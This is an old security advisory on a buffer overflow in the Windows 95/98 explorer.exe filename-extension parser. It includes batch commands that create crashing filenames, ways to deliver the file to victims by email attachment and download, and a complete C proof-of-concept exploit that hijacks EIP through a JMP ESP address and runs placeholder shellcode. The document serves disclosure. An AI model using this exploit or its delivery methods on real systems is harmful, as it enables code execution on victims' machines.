COMMAND
kernel (explorer.exe)
SYSTEMS AFFECTED
MS Windows '95/'98/SE
PROBLEM
Following is based on Securax Security Advisory. It is not known
what causes explorer to crash. It is suspected to be a buffer
overflow in explorer.exe but in some cases it's noticed other
programs (that do not use explorer.exe) crash too.
When the Microsoft Windows explorer tries to access parsing a
filename that contains >129 chars in the extension, a buffer will
overflow. And you will get this error:
EXPLORER caused an invalid page fault in
module <unknown> at 0000:61616161.
Registers:
EAX=61616161 CS=0187 EIP=61616161 EFLGS=00010246
EBX=80070032 SS=018f ESP=01a1d8fc EBP=61616161
ECX=c16b6f10 DS=018f ESI=01d0bd3c FS=5047
EDX=81724974 ES=018f EDI=7fcbd320 GS=0000
Bytes at CS:EIP:
Stack dump:
61616161 61616161 61616161 61616161 61616161 61616161 61616161
61616161 61616161 61616161 61616161 61616161 61616161 61616161
61616161 61616161
As you can notice, the EIP was overwritten during this overflow,
this means we can execute code from in the filename. We can use
247 + 129 + 118 bytes to store data for some shell code.
If you add some extra special characters to the file, you can
cause it to be recognized as write only in windows (and not found
in dos). That way, you will not be able to remove it unless you
write direct to the fat. This would make viruses invincible for
AV-tools.
Reproduction of the problem
===========================
For creating such a file place the following code in a .bat file:
echo This will create a file that when clicked upon in windows
echo explorer or any other program that calls explorer.exe for
echo file management will cause a buffer overflow.
dir *.* > _ . ------Bufferoverflow-----------aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
echo This will cause a Blue screen of death
echo Just to show you it is possible to execute remote code.
echo (all it does is overwrite the return adress with a false one.)
dir *.* > _ . ------Blue-screen-of-death------aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1234567890AAAAAAAAAA
or
ECHO Buffer overflow in windows98 explorer.exe
dir *.* > a.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
ECHO you can vary the amount of a's between 129 and 147 +/-.
ECHO try to vary this length, it will change results
Now run the .bat file.
How about using this bug on remote computers (tested on Eudora
Pro). You could attach the file to an e-mail and send this
e-mail to an unsuspected computer user. When he checks his e-mail
an the mail program attempts to save the attachement to disk, the
program will crash cause due to a buffer overflow:
EUDORA caused an invalid page fault in
module EUDORA.EXE at 0187:00428b05.
Registers:
EAX=007f0394 CS=0187 EIP=00428b05 EFLGS=00010206
EBX=00000000 SS=018f ESP=007eff88 EBP=007f0764
ECX=006a305c DS=018f ESI=007f07a8 FS=582f
EDX=007eff8c ES=018f EDI=8173b024 GS=0000
Bytes at CS:EIP:
56 50 51 52 ff 15 50 9f 63 00 8b 15 80 2c 6b 00
Stack dump:
Funny note: every time you try to access the dir where the
attachement should have been saved, your program will crash,
even if this program is not using explorer for it's file
management. (In this case you don't even have to click on the
file or move over it and wait some time, it will crash
immediately, rendering the entire directory useless. This is what
we get in Windows Commander while trying to browse the directory.
Note: the file doesn't show up in a listing, nevertheless, windows
commander crashes with:
Application Error
Exception EAccessViolation in module WINCMD32.EXE at 7F8B0736
Access violation at address 7FCB1946. Read of address 00580939
Scanning this dir with scandisk does not report any problems.
We can upload a file with this name to an FTP server, or place it
some HTTP server available for download, DCC Sends on IRC...
This type of attack will allow any user local or remote with
file creation access to run hostile code on the computer.
(Since e-mail programs will attempt to write to disk, almost
any windows98 user with an e-mail adress is vulnerable). If
someone writes some tiny code that will download and execute a
remote trojan, this could cause a huge problem! This could be
used to gain root access to all windows computers. Just imagine
what harm someone could cause if he sends out an e-mail to 10.000
persons containing code to DDoS some server?
Writing such a code might be tricky, coz we are handling with a
filename, and not all hex codes are accepted as a legal filename.
(this could be partially circumvented by creating the filename
with a raw write to disk). Everything stated about the executing
of code is purely hypothetical.
Laurent Eschenauer added following. He managed to write an
exploit for the nasty filename extension buffer overflow. If you
put more bytes in the extensions than in the batch proposed by
Zoa Chien (see above) you can overflow such that ESP is actually
pointing to your shellcode. If you don't fill in the buffer
enough you need to go upward in the stack to find a reference to
the extension... - Does that means we have two differents
buffer overflows?
Since we have ESP pointing to our code, we just have to find a JMP
ESP somewhere Laurent used one in comctl32.dll, but he's not sure
if this one is static in all win98 release.
Anyway, he putted an "int 3" as code to exec to show that it's
possible to use this baby. Anyway, it's going to be really tricky
to do more since we have only a few bytes of code (after the
smashed EIP at the end of the extension). One last thing, since
we have to create a file with our exploit as filename, we
encounters many "bad bytes" because you can't use everything you
want for a filename.
You'll find more technical details in the code, where are the
bytes that overwrite the eip, where should be the code, etc...
// Long filename extension exploit for Win 98
// Written by Laurent Eschenauer <Laurent.E@mail.com>
//
// This exploit is a follow up to Securax advisory posted on Vuln-dev scx-sa-02 by <zoachien@securax.org>
// I tested it with explorer.exe 4.72.3110.1
// In the sploit, i use a JMP ESP (FF E4) in comctl32.dll version 5.81
//
// I just stuffed an "int 3" in the shellcode, doing more is going to be tricky since
// we have a limited number of bytes for the code (about 50) and you have a lot of bad bytes
// since it has to be a filename....
//
// Have fun playing with this,
// If you do anything usefull with this one, please send me a copy and share it on vuln-dev (securityfocus.com)
//
// laurent. [kooka]
#include <stdio.h>
#define PATH "d:\\exploit" //Don't forget to change this
//put the exploit in a dir so it's easy to
//delete it !
main(int argc, char *argv[])
{
char command[1024];
char exploit[256];
FILE *hack;
int i;
// let's fill the sploit !
char flag = 'a';
char fill = 'A';
for (i=0;i<240;i+=4) //A little trick to easily find what is where in memory.
{
exploit[i]=flag;
exploit[i+1]=fill;
exploit[i+2]=fill+1;
exploit[i+3]=fill+2;
if (++flag=='z')
{
flag='a';
++fill;
}
}
exploit[240]=0x00; //240 bytes is the max, at least on my config.
//EAX - We control it, but who cares ?
exploit[127]=(char) 0x50;
exploit[128]=(char) 0x50;
exploit[129]=(char) 0x50;
exploit[130]=(char) 0x50;
//EBP Nothing cool to do with this one ?
exploit[135]=(char) 0x60;
exploit[136]=(char) 0x60;
exploit[137]=(char) 0x60;
exploit[138]=(char) 0x60;
//EIP I use a JMP ESP in comctl32.dll
exploit[139]=(char) 0x77;
exploit[140]=(char) 0xAD;
exploit[141]=(char) 0xB9;
exploit[142]=(char) 0xBF;
//Shellcode I didn't try anyhting else...work in progress
exploit[163]=(char) 0xCC;
exploit[164]=(char) 0xCC;
exploit[165]=(char) 0xCC;
// Let's do it !
sprintf(command,"%s\\AAAA.%s",PATH,exploit);
hack=fopen(command,"w");
if (hack==NULL)
{
printf("Error creating file, sorry !\n");
}
else
fclose(hack);
// Cool, just click the file and you'll smash the stack !
}
Domino and Notes servers running on NT boxes after receiving the
message with the attachment named 1._AAAAAAAAAAAAAAA...........
will five minutes later hang up.
Seems like win95 B (4.00.950B) is clean while .....
SOLUTION
Contrary to popular belief, Windows 98 without IE fixes much of
the OS. Most noted is the unending slew of bugs and
vulnerabilities that IE and Outlook bring to the OS. You should
use a utility called 98Lite that can be found at
http://www.98lite.net
and have systems that outperform and are more secure than any
Win98 systems setup as Microsoft would have you believe they need
to be.